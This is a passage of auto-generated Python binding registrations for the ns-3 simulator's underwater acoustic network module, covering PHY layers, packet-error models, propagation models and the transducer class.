## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateCcaBusy() [member function]
cls.add_method('IsStateCcaBusy',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateIdle() [member function]
cls.add_method('IsStateIdle',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateRx() [member function]
cls.add_method('IsStateRx',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateSleep() [member function]
cls.add_method('IsStateSleep',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateTx() [member function]
cls.add_method('IsStateTx',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::NotifyIntChange() [member function]
cls.add_method('NotifyIntChange',
'void',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::NotifyTransStartTx(ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('NotifyTransStartTx',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::RegisterListener(ns3::UanPhyListener * listener) [member function]
cls.add_method('RegisterListener',
'void',
[param('ns3::UanPhyListener *', 'listener')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SendPacket(ns3::Ptr<ns3::Packet> pkt, uint32_t modeNum) [member function]
cls.add_method('SendPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('uint32_t', 'modeNum')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetCcaThresholdDb(double thresh) [member function]
cls.add_method('SetCcaThresholdDb',
'void',
[param('double', 'thresh')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetCcaThresholdPhy1(double thresh) [member function]
cls.add_method('SetCcaThresholdPhy1',
'void',
[param('double', 'thresh')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetCcaThresholdPhy2(double thresh) [member function]
cls.add_method('SetCcaThresholdPhy2',
'void',
[param('double', 'thresh')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetChannel(ns3::Ptr<ns3::UanChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetDevice(ns3::Ptr<ns3::UanNetDevice> device) [member function]
cls.add_method('SetDevice',
'void',
[param('ns3::Ptr< ns3::UanNetDevice >', 'device')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetEnergyModelCallback(ns3::Callback<void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('SetEnergyModelCallback',
'void',
[param('ns3::Callback< void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetMac(ns3::Ptr<ns3::UanMac> mac) [member function]
cls.add_method('SetMac',
'void',
[param('ns3::Ptr< ns3::UanMac >', 'mac')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetModesPhy1(ns3::UanModesList modes) [member function]
cls.add_method('SetModesPhy1',
'void',
[param('ns3::UanModesList', 'modes')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetModesPhy2(ns3::UanModesList modes) [member function]
cls.add_method('SetModesPhy2',
'void',
[param('ns3::UanModesList', 'modes')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetPerModelPhy1(ns3::Ptr<ns3::UanPhyPer> per) [member function]
cls.add_method('SetPerModelPhy1',
'void',
[param('ns3::Ptr< ns3::UanPhyPer >', 'per')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetPerModelPhy2(ns3::Ptr<ns3::UanPhyPer> per) [member function]
cls.add_method('SetPerModelPhy2',
'void',
[param('ns3::Ptr< ns3::UanPhyPer >', 'per')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetReceiveErrorCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveErrorCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetReceiveOkCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveOkCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetRxGainDb(double gain) [member function]
cls.add_method('SetRxGainDb',
'void',
[param('double', 'gain')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetRxGainDbPhy1(double gain) [member function]
cls.add_method('SetRxGainDbPhy1',
'void',
[param('double', 'gain')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetRxGainDbPhy2(double gain) [member function]
cls.add_method('SetRxGainDbPhy2',
'void',
[param('double', 'gain')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetRxThresholdDb(double thresh) [member function]
cls.add_method('SetRxThresholdDb',
'void',
[param('double', 'thresh')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetSinrModelPhy1(ns3::Ptr<ns3::UanPhyCalcSinr> calcSinr) [member function]
cls.add_method('SetSinrModelPhy1',
'void',
[param('ns3::Ptr< ns3::UanPhyCalcSinr >', 'calcSinr')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetSinrModelPhy2(ns3::Ptr<ns3::UanPhyCalcSinr> calcSinr) [member function]
cls.add_method('SetSinrModelPhy2',
'void',
[param('ns3::Ptr< ns3::UanPhyCalcSinr >', 'calcSinr')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetSleepMode(bool sleep) [member function]
cls.add_method('SetSleepMode',
'void',
[param('bool', 'sleep')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetTransducer(ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('SetTransducer',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'trans')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetTxPowerDb(double txpwr) [member function]
cls.add_method('SetTxPowerDb',
'void',
[param('double', 'txpwr')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetTxPowerDbPhy1(double arg0) [member function]
cls.add_method('SetTxPowerDbPhy1',
'void',
[param('double', 'arg0')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetTxPowerDbPhy2(double arg0) [member function]
cls.add_method('SetTxPowerDbPhy2',
'void',
[param('double', 'arg0')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::StartRxPacket(ns3::Ptr<ns3::Packet> pkt, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('StartRxPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanPhyGen_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyGen::UanPhyGen(ns3::UanPhyGen const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyGen const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyGen::UanPhyGen() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): int64_t ns3::UanPhyGen::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::EnergyDepletionHandler() [member function]
cls.add_method('EnergyDepletionHandler',
'void',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyGen::GetCcaThresholdDb() [member function]
cls.add_method('GetCcaThresholdDb',
'double',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanPhyGen::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_const=True, is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::UanModesList ns3::UanPhyGen::GetDefaultModes() [member function]
cls.add_method('GetDefaultModes',
'ns3::UanModesList',
[],
is_static=True)
## uan-phy-gen.h (module 'uan'): ns3::Ptr<ns3::UanNetDevice> ns3::UanPhyGen::GetDevice() [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::UanNetDevice >',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): ns3::UanTxMode ns3::UanPhyGen::GetMode(uint32_t n) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('uint32_t', 'n')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): uint32_t ns3::UanPhyGen::GetNModes() [member function]
cls.add_method('GetNModes',
'uint32_t',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhyGen::GetPacketRx() const [member function]
cls.add_method('GetPacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True, is_virtual=True)
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyGen::GetRxGainDb() [member function]
cls.add_method('GetRxGainDb',
'double',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyGen::GetRxThresholdDb() [member function]
cls.add_method('GetRxThresholdDb',
'double',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): ns3::Ptr<ns3::UanTransducer> ns3::UanPhyGen::GetTransducer() [member function]
cls.add_method('GetTransducer',
'ns3::Ptr< ns3::UanTransducer >',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyGen::GetTxPowerDb() [member function]
cls.add_method('GetTxPowerDb',
'double',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyGen::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateBusy() [member function]
cls.add_method('IsStateBusy',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateCcaBusy() [member function]
cls.add_method('IsStateCcaBusy',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateIdle() [member function]
cls.add_method('IsStateIdle',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateRx() [member function]
cls.add_method('IsStateRx',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateSleep() [member function]
cls.add_method('IsStateSleep',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateTx() [member function]
cls.add_method('IsStateTx',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::NotifyIntChange() [member function]
cls.add_method('NotifyIntChange',
'void',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::NotifyTransStartTx(ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('NotifyTransStartTx',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::RegisterListener(ns3::UanPhyListener * listener) [member function]
cls.add_method('RegisterListener',
'void',
[param('ns3::UanPhyListener *', 'listener')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SendPacket(ns3::Ptr<ns3::Packet> pkt, uint32_t modeNum) [member function]
cls.add_method('SendPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('uint32_t', 'modeNum')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetCcaThresholdDb(double thresh) [member function]
cls.add_method('SetCcaThresholdDb',
'void',
[param('double', 'thresh')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetChannel(ns3::Ptr<ns3::UanChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetDevice(ns3::Ptr<ns3::UanNetDevice> device) [member function]
cls.add_method('SetDevice',
'void',
[param('ns3::Ptr< ns3::UanNetDevice >', 'device')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetEnergyModelCallback(ns3::Callback<void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetEnergyModelCallback',
'void',
[param('ns3::Callback< void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetMac(ns3::Ptr<ns3::UanMac> mac) [member function]
cls.add_method('SetMac',
'void',
[param('ns3::Ptr< ns3::UanMac >', 'mac')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetReceiveErrorCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveErrorCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetReceiveOkCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveOkCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetRxGainDb(double gain) [member function]
cls.add_method('SetRxGainDb',
'void',
[param('double', 'gain')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetRxThresholdDb(double thresh) [member function]
cls.add_method('SetRxThresholdDb',
'void',
[param('double', 'thresh')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetSleepMode(bool sleep) [member function]
cls.add_method('SetSleepMode',
'void',
[param('bool', 'sleep')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetTransducer(ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('SetTransducer',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'trans')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetTxPowerDb(double txpwr) [member function]
cls.add_method('SetTxPowerDb',
'void',
[param('double', 'txpwr')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::StartRxPacket(ns3::Ptr<ns3::Packet> pkt, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('StartRxPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanPhyPer_methods(root_module, cls):
## uan-phy.h (module 'uan'): ns3::UanPhyPer::UanPhyPer() [constructor]
cls.add_constructor([])
## uan-phy.h (module 'uan'): ns3::UanPhyPer::UanPhyPer(ns3::UanPhyPer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyPer const &', 'arg0')])
## uan-phy.h (module 'uan'): double ns3::UanPhyPer::CalcPer(ns3::Ptr<ns3::Packet> pkt, double sinrDb, ns3::UanTxMode mode) [member function]
cls.add_method('CalcPer',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'sinrDb'), param('ns3::UanTxMode', 'mode')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyPer::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyPer::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## uan-phy.h (module 'uan'): static ns3::TypeId ns3::UanPhyPer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyPerGenDefault_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerGenDefault::UanPhyPerGenDefault(ns3::UanPhyPerGenDefault const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyPerGenDefault const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerGenDefault::UanPhyPerGenDefault() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyPerGenDefault::CalcPer(ns3::Ptr<ns3::Packet> pkt, double sinrDb, ns3::UanTxMode mode) [member function]
cls.add_method('CalcPer',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'sinrDb'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyPerGenDefault::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyPerUmodem_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerUmodem::UanPhyPerUmodem(ns3::UanPhyPerUmodem const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyPerUmodem const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerUmodem::UanPhyPerUmodem() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyPerUmodem::CalcPer(ns3::Ptr<ns3::Packet> pkt, double sinrDb, ns3::UanTxMode mode) [member function]
cls.add_method('CalcPer',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'sinrDb'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyPerUmodem::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPropModel_methods(root_module, cls):
## uan-prop-model.h (module 'uan'): ns3::UanPropModel::UanPropModel() [constructor]
cls.add_constructor([])
## uan-prop-model.h (module 'uan'): ns3::UanPropModel::UanPropModel(ns3::UanPropModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPropModel const &', 'arg0')])
## uan-prop-model.h (module 'uan'): void ns3::UanPropModel::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-prop-model.h (module 'uan'): void ns3::UanPropModel::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## uan-prop-model.h (module 'uan'): ns3::Time ns3::UanPropModel::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_pure_virtual=True, is_virtual=True)
## uan-prop-model.h (module 'uan'): double ns3::UanPropModel::GetPathLossDb(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode txMode) [member function]
cls.add_method('GetPathLossDb',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'txMode')],
is_pure_virtual=True, is_virtual=True)
## uan-prop-model.h (module 'uan'): ns3::UanPdp ns3::UanPropModel::GetPdp(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPdp',
'ns3::UanPdp',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_pure_virtual=True, is_virtual=True)
## uan-prop-model.h (module 'uan'): static ns3::TypeId ns3::UanPropModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPropModelIdeal_methods(root_module, cls):
## uan-prop-model-ideal.h (module 'uan'): ns3::UanPropModelIdeal::UanPropModelIdeal(ns3::UanPropModelIdeal const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPropModelIdeal const &', 'arg0')])
## uan-prop-model-ideal.h (module 'uan'): ns3::UanPropModelIdeal::UanPropModelIdeal() [constructor]
cls.add_constructor([])
## uan-prop-model-ideal.h (module 'uan'): ns3::Time ns3::UanPropModelIdeal::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-ideal.h (module 'uan'): double ns3::UanPropModelIdeal::GetPathLossDb(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPathLossDb',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-ideal.h (module 'uan'): ns3::UanPdp ns3::UanPropModelIdeal::GetPdp(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPdp',
'ns3::UanPdp',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-ideal.h (module 'uan'): static ns3::TypeId ns3::UanPropModelIdeal::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPropModelThorp_methods(root_module, cls):
## uan-prop-model-thorp.h (module 'uan'): ns3::UanPropModelThorp::UanPropModelThorp(ns3::UanPropModelThorp const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPropModelThorp const &', 'arg0')])
## uan-prop-model-thorp.h (module 'uan'): ns3::UanPropModelThorp::UanPropModelThorp() [constructor]
cls.add_constructor([])
## uan-prop-model-thorp.h (module 'uan'): ns3::Time ns3::UanPropModelThorp::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-thorp.h (module 'uan'): double ns3::UanPropModelThorp::GetPathLossDb(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPathLossDb',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-thorp.h (module 'uan'): ns3::UanPdp ns3::UanPropModelThorp::GetPdp(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPdp',
'ns3::UanPdp',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-thorp.h (module 'uan'): static ns3::TypeId ns3::UanPropModelThorp::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanTransducer_methods(root_module, cls):
## uan-transducer.h (module 'uan'): ns3::UanTransducer::UanTransducer() [constructor]
cls.add_constructor([])
## uan-transducer.h (module 'uan'): ns3::UanTransducer::UanTransducer(ns3::UanTransducer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanTransducer const &', 'arg0')])
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::AddPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AddPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_pure_virtual=True, is_virtual=True)
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-transducer.h (module 'uan'): std::list<ns3::UanPacketArrival, std::allocator<ns3::UanPacketArrival> > const & ns3::UanTransducer::GetArrivalList() const [member function]
cls.add_method('GetArrivalList',
'std::list< ns3::UanPacketArrival > const &',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanTransducer::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): std::list<ns3::Ptr<ns3::UanPhy>, std::allocator<ns3::Ptr<ns3::UanPhy> > > const & ns3::UanTransducer::GetPhyList() const [member function]
cls.add_method('GetPhyList',
'std::list< ns3::Ptr< ns3::UanPhy > > const &',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): ns3::UanTransducer::State ns3::UanTransducer::GetState() const [member function]
cls.add_method('GetState',
'ns3::UanTransducer::State',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): static ns3::TypeId ns3::UanTransducer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-transducer.h (module 'uan'): bool ns3::UanTransducer::IsRx() const [member function]
cls.add_method('IsRx',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): bool ns3::UanTransducer::IsTx() const [member function]
cls.add_method('IsTx',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::Receive(ns3::Ptr<ns3::Packet> packet, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('Receive',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_pure_virtual=True, is_virtual=True)
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::SetChannel(ns3::Ptr<ns3::UanChannel> chan) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'chan')],
is_pure_virtual=True, is_virtual=True)
## uan-transducer.h (module 'uan'): void ns3::UanTransducer::Transmit(ns3::Ptr<ns3::UanPhy> src, ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('Transmit',
'void',
